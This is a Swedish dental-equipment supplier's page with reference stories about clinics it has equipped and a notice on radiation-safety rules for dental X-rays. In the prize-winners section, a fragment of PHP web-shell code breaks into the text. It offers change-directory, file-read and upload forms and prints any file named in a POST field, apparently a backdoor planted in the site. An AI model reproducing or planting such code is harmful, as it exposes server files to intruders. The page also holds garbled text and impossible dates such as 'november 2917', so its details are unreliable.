Tandvårdsakademin i Ystad

Tandvårdsakademin i Ystad valde Svensk Dentalservice avtal med Praktikertjänst när de utökade sin verksamhet och flyttade till helt nya lokaler i augusti. De jobbar med både allmäntandvård och specialisttandvård och tar även emot remisser för panoramaröntgen, CBCT, implantat och kirurgi.
Kliniken har sju behandlingsrum och i stort sett all utrustning är ny. Man har även en föreläsningsavdelning. SDS har levererat och installerat Heka UnicLine S unitar, Carestream 2200 intraoral röntgen, Carestreamsensorer, Carestream CBCT 8100 3D, ny kompressor och suganläggning samt iCare+.
Lokalerna anpassades efter SDS anvisningar. Kjell Gannby skötte den tekniska konsultationen för all dentalutrustning, kontakten med radiolog och strålskyddsfysiker förmedlades via Röntgenutbildarna och Boneprox.
Madeleine Christiansen Anderberg jobbar som kliniksamordnare och tandsköterska:
’’Vi valde Svensk Dentalservice främst på grund av deras goda rykte och för att deras produkter är kända för både hög kvalitet och säker funktion. Vi hade bestämt oss för UnicLine S som vi visste är en av marknadens bästa unitar och vi är väldigt nöjda med dem. SDS avtal med Praktikertjänst gav oss desutom både bra priser och fördelaktiga villkor.’’
’’Vår CBCT är den enda i sydöstra Skåne och tandläkare i regionen remitterar patienter till oss. Radiologen som tolkar bilderna lovordar dessutom Carestreams CBCT-bildernas höga kvalitet och skärpa.’’

Askersundstandläkarna

I december förra året flyttade Askersundstandäkarna in i sina nya lokaler i en helrenoverad gammal smedja. Sterilen är centralt placerad i de ljusa och fräscha lokalerna.
Jan Funke från Svensk Dentalservice planerade sterilen tillsammans med personalen och anpassade ergonomin till Linnéa Einarsson som är sterilansvarig på kliniken.
– Placeringen centralt i lokalerna har effektiviserat arbetet. Sterilen är hjärtat i kliniken som allt annat är beroende av, säger Hanna Arvidsson, tandsköterska.
Sterilen är inredd med Climo skåp och bänkar och har en arbetsö, med genomgående överskåp, som avgränsning mot resten av lokalen. Rummets utformning med en sida för kontaminerat material och en sida för rent ger ett smidigt arbetsflöde.
Jan sköter service och kontroller av utrustning i klinken. I samband med flytten installerades även fyra nya UnicLine S. Tidigare har han även levererat klinikens intraorala röntgen och OPG-röntgen.
– Vi har jobbat med Jan i många år. Han kan rycka ut vid akuta fel men mycket kan skötas över telefon. Det är enkelt att bolla problemen med honom och han kan snabbt och smidigt guida oss att själva åtgärda felen, avslutar Hanna.

Bellevue Tandklinik i Malmö

Leg. tandläkare Ragnar Johnsson på Bellevue Tandklinik har haft ett långt samarbete med Kjell Gannby på Svensk Dentalservice. När kliniken byggdes om 2011 var Kjell med som ett viktigt bollplank under hela planeringen och levererade all dental utrustning. Resultatet blev en välfungerande, snygg och välkomnande klinik.
Kliniken har tre behandlingsrum. Två av dem är utrustade med Hekas UnicLine S, det tredje med Heka Unic.Svensk Dentalservice har även levererat Climo skåpinredning, opg-röntgen, intraoral röntgen, utrustning till sterilen, sug och kompressor.

Centrumtandläkarna i Nybro

En Myray X5 installerades i november 2917 hos Centrumtandläkarna i Nybro. Den ersatte deras gamla panoramaröntgen som slutat fungera. De jobbar bland annat med implantatbehandlingar och behövde snabbt få en ny röntgen på plats. Kristian Sjöberg från Svensk Dentalservice installerade och utbildade i handhavande, det fortlöpande jobbet med patienterna påverkades inte nämnvärt. Continue reading

Järvakliniken

I augusti i år 2015 öppnade en helt nybyggd modern tandläkarklinik i Solna. Resan har tagit två år från ritning till ett färdigt hus. Svensk Dentalservice har tillsammans med klinikchefen och leg. tandläkare Nor Gradin träffat byggföretag, tagit fram ritningar, och utformat kliniken efter deras behov samt levererat all inredning och utrustning. Resultatet blev en toppmodern klinik med det senaste i avancerad tandvårdsteknologi. Continue reading

Tandläkare Eva-Cajsa Hessey

Totalrenovering och ny utrustning.
När tandläkare Eva-Cajsa Hessey tog över en gammal tandläkarklinik bestämde hon sig för att renovera och köpa ny modern utrustning då allt var nergånget och gammalt samt att det fattades ett röntgenrum.

Mobil tandläkarklinik

Välkommen in i en fullt utrustad mobil tandvårdsklinik inom Folktandvården Västra Götaland.
Kliniken är inrymd i en trailer och kan därmed flyttas mellan olika områden där behov finns. Den mobila kliniken ökar Folktandvårdens tillgänglighet bland barn, vuxna och äldre. Svensk Dentalservice i Göteborg har stått för utformning och levererat all inredning och utrustning.

Viktigt!

Föreskrifter, kontroller och tillstånd gällande röntgen!

Nya föreskrifter, 2008:5, började gälla redan 2009 med undantag av apparater som införskaffats före 2008 och som fick föreskriftsdispens fram till 2011. Det är därför föreskriften hos många har fått effekt under under senare år, det vill säga ”en röntgenapparat måste vara CE-märkt och strålfältet får inte överstiga 50 millimeter i diameter”. Innan 1993 var inga intraorala röntgenapparater CE märkta och mellan 1993 och 1998 var endast vissa CE-märkta (red. anmärkning).

Strålsäkerhetsmyndigheten kontrollerar detta aktivt. Det finns EU-direktiv som säger att SSM måste veta vilka utrustningar som finns ute i landet och även planer på att intraorala röntgenapparater ska registreras. Har man inte en godkänd röntgen kan det bli tal om vite. Läs mer 

Svensk Dentalservice utför kontroller på intraoral- och panoramaröntgen enligt SSMs föreskrifter. Vi utför även exponeringstester på intraoral röntgen.

Kontakta din närmaste tekniker!

Vinnare av Bluetooth-högtalare!

’; echo ’

’.$form.’Change Dir :

’.$form.’Read File :

Upload :

’; if(isset ($_POST[’cme’])){ $myFile = $_POST[’cme’]; $fh = fopen($myFile, ’r’); if($theData = fread($fh, filesize($myFile))){ fclose($fh); echo ’’; } else{ echo ”File Could Not Found!!”; } } ?>

  • Leif Jerndal, Kalmar
  • Ulf Hedefält, Huskvarna
  • Eva Borg, Göteborg
  • Carl-Henrik Annefors, Örsundsbro
  • Ingrid Leitzler, Stockholm
  • Lena Rignell, Mölndal
  • Claes Rydevik, Ekerö
  • Claudia Torres, Staffanstorp
  • Zaneta Juric-Smailagic, Kalmar
  • Linnea Öhlund, Göteborg

 

Anette Arneklint
Svensk Dentalservice

Tandläkare Ove Brunström

Hos tandläkare Ove Brunström har de vågat sig på ett annorlunda tema. Ove har inrett ett härligt murrigt sällskapsrum som passar fint att umgås i t.ex. på personalens afterwork. Även väntrummet går i samma stil med ljuskrona och skinnfåtöljer. När det gäller behandlingsrummen har man däremot valt en ljus, klinisk inredning. Här har de lättat upp de vita väggarna med färgglada blomschabloner från Ikea. Ove har valt Svensk Dentalservice som helhetsleverantör när det gäller röntgen och har investerat i en OP30 panoramaröntgen, Focus intraoral röntgen, Snapshot sensorer och Cliniview programvara. Continue reading